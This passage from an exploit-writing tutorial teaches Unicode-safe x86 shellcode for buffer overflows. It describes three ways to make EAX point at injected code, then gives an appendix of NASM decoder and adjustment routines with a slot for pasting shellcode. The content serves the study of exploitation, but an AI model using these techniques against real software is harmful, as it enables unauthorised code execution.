of the added null bytes, we must at worst add 0x100 / 2 = 128 bytes)
|
|
|
|
|
|
-> 2nd idea : a little less lucky.
|
|
|
|
If you can't find a close address within yours registers, you can maybe
|
|
find one in the stack. Let's just hope your ESP wasn't smashed after the
|
|
overflow.
|
|
You just have to POP from the stack until you find a nice address. This
|
|
methode can't be explained in a general way, but the stack always contains
|
|
addresses the application used before you bothered it. Note that you can
|
|
use POPAD to pop EDI, ESI, EBP, EBX, EDX, ECX, and EAX.
|
|
Then we use the same methode as above.
|
|
|
|
|
|
|
|
-> 3rd idea : god forgive me.
|
|
|
|
Here we suppose we don't have any interesting register, or that the values
|
|
that the registers contain change from a try to another. Moreover, there's
|
|
nothing interesting inside the stack.
|
|
|
|
This is a desperate case so -> we use an old style samoura suicide attack.
|
|
|
|
My last idea is to :
|
|
|
|
- Take a "random" memory location that has write access
|
|
- Patch it with 3 bytes
|
|
- Call this location with a relative call
|
|
|
|
First part is the more hazardous : we need to find an address that is
|
|
within a writeable section. We'd better find one at the end of a section
|
|
full on nulls or something like that, because we're gonna call quite
|
|
randomly. The easiest way to do this is to take for example the .data
|
|
section of the target Portable Executable. It is usually a quite large
|
|
section with Flags : Read/Write/Data.
|
|
So this is not a problem to kind of 'hardcode' an address in this area.
|
|
So for the first step we just pisk an address in the middle of this,
|
|
it won't matter where.
|
|
(N.B : if one of your register points to a valid location after the
|
|
overflow, you don't have to do all this of course)
|
|
We assume the address is 0x004F1200 for example :
|
|
|
|
Using what we saw previously, it is easy to set EAX to this address :
|
|
________________________________________________________________
|
|
|B8004F00AA mov eax,0xAA004F00 ; EAX = 0xAA004F00 |
|
|
|50 push eax |
|
|
|4C dec esp |
|
|
|58 pop eax ; EAX = 0x004F00?? |
|
|
|B000 mov al,0x0 ; EAX = 0x004F0000 |
|
|
|B9001200AA mov ecx,0xAA001200 |
|
|
|00EC add ah,ch |
|
|
| ; finally : EAX = 0x004F1200 |
|
|
|________________________________________________________________|
|
|
|
|
|
|
Then we will patch this writeable memory location with (guess what) :
|
|
________________________________________________________________
|
|
|pop eax |
|
|
|push eax |
|
|
|ret |
|
|
|________________________________________________________________|
|
|
|
|
Hex code of the patch : [58 50 C3]
|
|
|
|
This would give us, after we called this address, a pointer to our code in
|
|
EAX. This would be the end of the trouble. So let's patch this :
|
|
|
|
Remember that EAX contains the address we are patching. What we are going
|
|
to do is first patch with 58 00 C3 00 then move EAX 1 byte ahead, and put
|
|
the last byte : 0x50 between the two others.
|
|
(N.B : don't forget that byte are pushed in a reverse order in the stack)
|
|
|
|
________________________________________________________________
|
|
|C7005800C300 mov dword [eax],0x00C30058 |
|
|
|40 inc eax |
|
|
|C60050 mov byte [eax],0x50 |
|
|
|________________________________________________________________|
|
|
|
|
Done with patching. Now we must call this location. I no i said that we
|
|
couldn't call anything, but this is a desperate case, so we use a
|
|
relative call :
|
|
|
|
________________________________________________________________
|
|
|E800??00!! call (here + 0x!!00??00) |
|
|
| (**) |
|
|
|________________________________________________________________|
|
|
|
|
In order to get this methode working, you have to patch the end of a large
|
|
memory section containing nulls for example. Then we can call anywhere in
|
|
the area, it will end up executing our 3 bytes code.
|
|
|
|
After this call, EAX will have the address of (**), we are saved because we
|
|
just need to add EAX a value we can calculate because it is just a
|
|
difference between two offsets of our code. Therefore, we can't use
|
|
previous technique to add bytes to EAX because we want to add less then
|
|
0x100. So we can't do the {add eax, imm32} stuff. Let's do something else :
|
|
|
|
add dword [eax], byte 0x??
|
|
|
|
is the key, because we can add a byte to a dword, this is perfect.
|
|
|
|
EAX points to (**), se can can use this memory location to set the new EAX
|
|
value and put it back into EAX. We assume we want to add 0x?? to eax :
|
|
(N.B : 0x?? can't be larger than 0x80 because the :
|
|
add dword [eax], byte 0x??
|
|
we are using is signed, so if you set a large value, it will sub instead of
|
|
add. (Then add a whole 0x100 and add some align to your code but this won't
|
|
happen as 42*2 bytes isn't large enough i think)
|
|
________________________________________________________________
|
|
|0400 ad al,0x0 ; the 0x04 will be overwritten|
|
|
|8900 mov [eax],eax |
|
|
|8300?? add dword [eax],byte 0x?? |
|
|
|8B00 mov eax,[eax] |
|
|
|________________________________________________________________|
|
|
|
|
Everything is alright, we can make EAX point to the exact first null byte
|
|
of loop_code as we wished.
|
|
We just need to calculate 0x?? (just count the bytes including nulls
|
|
between loop_code and the call and you'll find 0x5A)
|
|
|
|
|
|
|
|
|
|
--[ 6 - Conclusion
|
|
|
|
Finally, we could make a unishellcode, that won't be altered after a
|
|
str to unicode transformation.
|
|
I'm waiting other ideas or techniques to perform this, i'm sure there
|
|
are plenty of things i haven't thought about.
|
|
|
|
|
|
|
|
Thanks to :
|
|
- NASM Compiler and disassembler (i like its style =)
|
|
- Datarescue IDA
|
|
- Numega SoftIce
|
|
- Intel and its processors
|
|
|
|
Documentation :
|
|
- http://www.intel.com for the official intel assembly doc
|
|
|
|
Greetings go to :
|
|
- rix, for showing us beautiful things in his articles
|
|
- Tomripley, who always helps me when i need him !
|
|
|
|
|
|
|
|
--| 7 - Appendix : Code
|
|
|
|
|
|
For test purpose, i give you a few lines of code to play with (NASM style)
|
|
It is not really a code sample, but i gathered all my examples so that you
|
|
don't have to look everywhere in my messy paper to find what you need...
|
|
|
|
- main.asm ----------------------------------------------------------------
|
|
%include "\Nasm\include\language.inc"
|
|
|
|
[global main]
|
|
|
|
segment .code public use32
|
|
..start:
|
|
|
|
; *********************************************
|
|
; * Assuming EAX points to (*) (see below) *
|
|
; *********************************************
|
|
|
|
;
|
|
; Setting EBX to 0x00000000 and ECX to 0x00000500
|
|
;
|
|
push byte 00 ; 6A00
|
|
push byte 00 ; 6A00
|
|
pop ebx ; 5D
|
|
add [ebp+0x0],al ; 004500
|
|
pop ecx ; 59
|
|
add [ebp+0x0],al ; 004500
|
|
mov edx,0x41000500 ; BA00050041
|
|
add ch,dh ; 00F5
|
|
|
|
|
|
;
|
|
; Setting the loop_code
|
|
;
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0x8A ; C6008A
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0x58 ; C60058
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0x14 ; C60014
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0xE2 ; C600E2
|
|
add [ebp+0x0],al ; 004500
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
;
|
|
; Loop_code
|
|
;
|
|
|
|
db 0x43
|
|
db 0x00 ;0x8A (*)
|
|
db 0x14
|
|
db 0x00 ;0x58
|
|
db 0x88
|
|
db 0x00 ;0x14
|
|
db 0x18
|
|
db 0x00 ;0xE2
|
|
db 0xF7
|
|
|
|
; < Paste 'unicode' shellcode there >
|
|
|
|
-EOF-----------------------------------------------------------------------
|
|
|
|
Then the 3 methodes to get EAX to point to the chosen code.
|
|
(N.B : The 'main' code is 42*2 = 84 bytes long)
|
|
|
|
- methode1.asm ------------------------------------------------------------
|
|
; *********************************************
|
|
; * Adjusts EAX (+ 0xXXYY bytes) *
|
|
; *********************************************
|
|
|
|
; N.B : 0xXX != 0x00
|
|
|
|
add eax,0x0100XX00 ; 0500XX0001
|
|
add [ebp+0x0],al ; 004500
|
|
add eax,0xFF000100 ; 05000100FF
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; we added 0x(XX+1)00 to EAX
|
|
|
|
; using : add al,0x0 as a NOP instruction :
|
|
add al,0x0 ; 0400
|
|
add al,0x0 ; 0400
|
|
add al,0x0 ; 0400
|
|
; [...] <-- (0x100 - 0xYY) /2 times
|
|
add al,0x0 ; 0400
|
|
add al,0x0 ; 0400
|
|
add al,0x0 ; 0400
|
|
|
|
; (N.B) if 0xYY is odd then add a :
|
|
dec eax ; 48
|
|
add [ebp+0x0],al ; 004500
|
|
-EOF-----------------------------------------------------------------------
|
|
|
|
|
|
|
|
- methode2.asm ------------------------------------------------------------
|
|
; *********************************************
|
|
; * Basically : POPs and XCHG *
|
|
; *********************************************
|
|
|
|
popad ; 61
|
|
add [ebp+0x0],al ; 004500
|
|
xchg eax, ? ; 1 non null byte (find out what to do here)
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; do it again if needed, then use methode1 to make everything okay
|
|
-EOF-----------------------------------------------------------------------
|
|
|
|
|
|
|
|
- methode3.asm ------------------------------------------------------------
|
|
; *********************************************
|
|
; * Using a CALL *
|
|
; *********************************************
|
|
|
|
; Get the wanted address
|
|
|
|
mov eax,0xAA00??00 ; B800??00AA
|
|
add [ebp+0x0],al ; 004500
|
|
push eax ; 50
|
|
add [ebp+0x0],al ; 004500
|
|
dec esp ; 4C
|
|
add [ebp+0x0],al ; 004500
|
|
pop eax ; 58
|
|
add [ebp+0x0],al ; 004500
|
|
mov al,0x0 ; B000
|
|
mov ecx,0xAA00!!00 ; B900!!00AA
|
|
add ah,ch ; 00EC
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; EAX = 0x00??!!00
|
|
|
|
; awfull patch, i agree
|
|
mov dword [eax],0x00C30058 ; C7005800C300
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0x50 ; C60050
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; just pray and call
|
|
|
|
call 0x???????? ; E800!!00??
|
|
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; then add 90d = 0x5A to EAX (to reach (*), where the loop_code is)
|
|
; case where 0xXX = 0x00 so we can't use methode1
|
|
|
|
add al,0x0 ; 0400 because we're patching at [eax]
|
|
|
|
mov [eax],eax ; 8900
|
|
add dword [eax],byte 0x5A ; 83005A
|
|
add [ebp+0x0],al ; 004500
|
|
mov eax,[eax] ; 8B00
|
|
|
|
; EAX pointes to the very first null byte of loop_code
|
|
|
|
|
|
|=[ EOF ]=---------------------------------------------------------------=|
|
|
|